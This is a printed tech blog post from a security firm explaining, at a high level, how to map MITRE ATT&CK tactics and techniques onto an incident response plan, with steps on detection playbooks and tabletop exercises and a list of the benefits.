02/11/2023, 20:48 Make the MITRE ATT&CK Framework Part Of Your Incident Response Plan To Stay Ahead of Threats

Ahead of Threats | RiverSafe

Contact Us

RESOURCES
THOUGHTS AND ARTICLES FROM
OUR TECHNICAL TEAM

INTEGRATING THE MITRE ATT&CK INTO YOUR

INCIDENT RESPONSE PLAN
BY VINAYA SHESHADRI TECH BLOG
Is your SIE
scratch? U
security ris
poorly imp
SIEM
BY JAMIU AK

TECH BLOG
Ensuring S
Complianc
Based SIE
BY ILYASS AO

In today’s cybersecurity landscape, organisations face a growing number of sophisticated and

persistent cyber threats. To stay ahead of these threats, security teams must have a comprehensive
and proactive approach to incident response. One way to achieve this is by integrating the MITRE
ATT&CK framework into your incident response plan.
TECH BLOG

WHAT IS THE MITRE AT T&CK FRAMEWORK? Navigating

Updated N
The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is a globally Cybersecu
recognised knowledge base of adversary tactics and techniques used during cyberattacks. It is Framewor
designed to help organisations understand how attackers operate, what their objectives are, and how BY VINAYA SH

they can defend against them.

The framework is organised into tactics and techniques, with tactics representing the overarching
goals of an attack and techniques being the specific methods used to achieve those goals. The
framework covers a wide range of cyber threats, including Advanced Persistent Threats (APTs),
malware, and ransomware attacks.

INTEGRATING THE MITRE ATT&CK FRAMEWORK

INTO YOUR INCIDENT RESPONSE PLAN
Integrating the MITRE ATT&CK framework into your incident response plan can help your organisation
improve its response to cyber threats by providing a structured approach to incident response. Here

https://riversafe.co.uk/resources/tech-blog/integrating-the-mitre-attck-into-your-incident-response-plan/ 1/4
02/11/2023, 20:48 Make the MITRE ATT&CK Framework Part Of Your Incident Response Plan To Stay Ahead of Threats | RiverSafe
are some steps to follow to integrate the MITRE ATT&CK framework into your incident response plan:
Contact Us

STEP 1: IDENTIFY RELEVANT TACTICS AND TECHNIQUES

The first step is to identify the relevant tactics and techniques for your organisation. This involves
reviewing the MITRE ATT&CK framework and selecting the tactics and techniques that are most
relevant to your organisation’s infrastructure, assets, and threat landscape.

For example, if your organisation uses cloud services, you may want to focus on tactics and techniques
related to cloud security, such as using stolen credentials to access cloud services or exploiting
misconfigured cloud environments.

STEP 2: MAP TACTICS AND TECHNIQUES TO YOUR INCIDENT RESPONSE

PLAN

Once you have identified the relevant tactics and techniques, the next step is to map them to your
incident response plan. This involves identifying the specific steps that need to be taken to detect and
respond to each tactic and technique.

For example, if a malware attack is detected, your incident response plan may include steps such as
isolating infected machines, conducting malware analysis, and patching vulnerabilities that were
exploited.

STEP 3: DEVELOP DETECTION AND RESPONSE PLAYBOOKS

Once you have mapped the tactics and techniques to your incident response plan, the next step is to
develop detection and response playbooks. These playbooks are detailed plans that outline the
specific steps that need to be taken to detect and respond to each tactic and technique.

For example, your detection and response playbook for a malware attack may include steps such as
monitoring network traffic for suspicious activity, analysing system logs for signs of malware activity,
and conducting a threat hunt to identify the source of the attack.

STEP 4: TEST AND REFINE YOUR INCIDENT RESPONSE PLAN

The final step is to test and refine your incident response plan. This involves conducting regular
simulations and exercises to test the effectiveness of your plan and identify areas for improvement.

For example, you may conduct a tabletop exercise where your incident response team works through
a simulated attack scenario using your detection and response playbooks. This can help identify any
gaps or weaknesses in your plan and enable you to refine your processes and procedures

INTEGRATING THE MITRE ATT&CK FRAMEWORK

INTO YOUR INCIDENT RESPONSE PLAN CAN
PROVIDE SEVERAL BENEFITS, INCLUDING:
1. E N H A N C E D D E T E C T I O N A N D R E S P O N S E

By mapping the tactics and techniques to your incident response plan, you can improve your
organisation’s ability to detect and respond to cyber threats. This structured approach ensures that
your incident response team has a clear understanding of the steps that need to be taken to detect
and respond to each type of attack.

• BETTER COLLABORATION

Integrating the MITRE ATT&CK framework into your incident response plan can promote enhanced
collaboration across teams within your organization. By using a common language to describe tactics
and techniques, all teams can communicate more effectively, leading to more efficient and effective
incident response.

• IMPROVED THREAT INTELLIGENCE

https://riversafe.co.uk/resources/tech-blog/integrating-the-mitre-attck-into-your-incident-response-plan/ 2/4
02/11/2023, 20:48 Make the MITRE ATT&CK Framework Part Of Your Incident Response Plan To Stay Ahead of Threats | RiverSafe
The MITRE ATT&CK framework is regularly updated with new tactics and techniques used by
Contactresponse
adversaries. By integrating the framework into your incident Us plan, your organisation can stay
up-to-date with the latest threats and leverage this knowledge to improve your overall security
posture.

• COMPLIANCE WITH INDUSTRY STANDARDS

The MITRE ATT&CK framework has become a widely recognised standard in the cybersecurity
industry. By integrating the framework into your incident response plan, you can demonstrate to
regulators, auditors, and customers that your organization is committed to using best practices in
incident response.

• IMPROVED INCIDENT RESPONSE PLANNING

By using the MITRE ATT&CK framework to map tactics and techniques to your incident response plan,
you can identify gaps in your plan and improve your processes and procedures. Regular testing and
refinement of your plan based on the latest threats can help ensure that your organisation is prepared
to respond effectively to cyberattacks.

Conclusion

Integrating the MITRE ATT&CK framework into your incident response plan can help your organisation
improve its ability to detect and respond to cyber threats, promote collaboration across teams, stay up
to date with the latest threats, comply with industry standards, and improve your overall incident
response planning.

By following the steps outlined above, your organisation can take advantage of the benefits of the
MITRE ATT&CK framework and better protect your assets and data from cyber threats.

Looking for help with your cyber security strategy? Contact us to see how we can help

BY VINAYA SHESHADRI

Back to Resources

Cyber Security Solutions DevOps Data Operations

NEXT-GEN SIEM DevSecOps ITOA
SIEM Health Check Project EZE – DevSecOps UEBA
RiverSafe Ltd - Regist
SOAR Automation Advanced Visualisation 06715188. Regi
Cloud Security Advanced Analytics Paternoster House,
Threat Intelligence London, Unit

Engagement Models © 2023 RiverSafe

https://riversafe.co.uk/resources/tech-blog/integrating-the-mitre-attck-into-your-incident-response-plan/ 3/4
02/11/2023, 20:48 Make the MITRE ATT&CK Framework Part Of Your Incident Response Plan To Stay Ahead of Threats | RiverSafe
Privacy Policy . C
Contact Us

https://riversafe.co.uk/resources/tech-blog/integrating-the-mitre-attck-into-your-incident-response-plan/ 4/4